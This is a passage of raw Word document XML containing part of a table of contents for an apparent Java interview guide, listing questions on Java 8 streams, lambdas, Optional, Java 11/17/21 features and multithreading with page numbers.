                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307720 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>340</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="531A8A72" w14:textId="15A03D7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2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Consumer and Supplier?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307721 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>341</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C3E24BC" w14:textId="372B838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2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Optional case returning null and String, how to handle it? What are the advantages of using it?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307722 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>341</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="37141AA9" w14:textId="7FD1A71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2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Give an example of Functional Interface in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307723 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>342</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="194FA17C" w14:textId="437B183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2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Suppose you are using lambda expressions and other than lambda expressions then are we getting any performance benefits?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307724 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>343</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1EF2CE97" w14:textId="6E54975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2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Can you elaborate on the Stream API, purpose and use of it?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307725 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>345</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="63EC47B4" w14:textId="007D24E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2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Can we have more than one abstract method in a functional interface?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307726 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>348</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A879DDA" w14:textId="22BD4A2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2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ave you worked on NullPointerException? How to handle NullPointerException in java 8?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307727 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>349</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3FBFAFC1" w14:textId="6F46534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2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Parallel Stream and Serial Stream?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307728 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>350</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="37C646D2" w14:textId="2EE34312" w:rsidR="00012799" w:rsidRDefault="00012799">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10194"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196307729" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Java 11 Features</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307729 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>352</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4C97B99C" w14:textId="51A6F1F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3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Java 11 features?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307730 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>352</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="73B86EE9" w14:textId="28AAC236" w:rsidR="00012799" w:rsidRDefault="00012799">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10194"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196307731" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Java 17 Features</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307731 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>354</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0583C74D" w14:textId="4756E10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3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Java 17 features?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307732 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>354</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B8182C1" w14:textId="694E3E6E" w:rsidR="00012799" w:rsidRDefault="00012799">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10194"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196307733" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Java 21 Features</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307733 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>356</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2281FF48" w14:textId="08DBDD2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3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Java 21 features?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307734 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>356</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="702B2679" w14:textId="4AE8CC6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3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added version after Java 17 to Java 21?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307735 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>357</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="426FEE70" w14:textId="31D8A287" w:rsidR="00012799" w:rsidRDefault="00012799">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10194"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196307736" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Multithreading</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307736 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>359</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B1B098A" w14:textId="4CA60AC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3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multithreading in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307737 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>359</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3749DE95" w14:textId="7031DC0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3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Process and Thread?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307738 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>361</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="27ECBFBD" w14:textId="0377551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3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the Thread Life Cycle?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307739 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>362</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="408485AF" w14:textId="72C9BDD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4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a deadlock? Explain with an example?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307740 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>364</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3709641D" w14:textId="2D94909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4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a Synchronized Thread?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307741 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>366</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7E5288B2" w14:textId="12E23B3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4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synchronized and volatile keyword?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307742 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>368</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
